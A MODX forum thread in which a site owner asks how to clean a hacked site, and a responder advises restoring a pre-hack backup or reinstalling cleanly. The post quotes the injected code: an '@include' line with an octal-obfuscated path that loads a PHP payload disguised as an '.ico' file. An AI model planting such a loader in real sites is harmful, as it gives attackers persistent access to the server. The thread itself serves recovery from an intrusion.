We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 473
    • 70 Posts
    I have updated modx 2.6.5 and gallery 1.7.1 but index.php still inject scripts like this:
    $rifilename='/srv/users/serverpilot/apps/amfg/public/assets/brosur/thumb/10-Indofigur NEWs.jpg-';
    @include "\057srv/\165sers\057serv\145rpil\157t/ap\160s/am\146g/pu\142lic/\141sset\163/com\160onen\164s/ti\156ymce\057.fb9\06523dc\056ico";

    please help to clean up
      • 3749
      • 24,544 Posts
      Upgrading MODX and Gallery won't help clean your site, since hackers almost always leave non-MODX files they can use to get back in. The best solution is to restore a backup from before the hack and then upgrade MODX and Gallery.

      If you don't have such a backup, you can either try to find and remove all the offending files, or back up your site, wipe everything, install a clean new version, and cut-and-paste your content and users into the new site.

        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting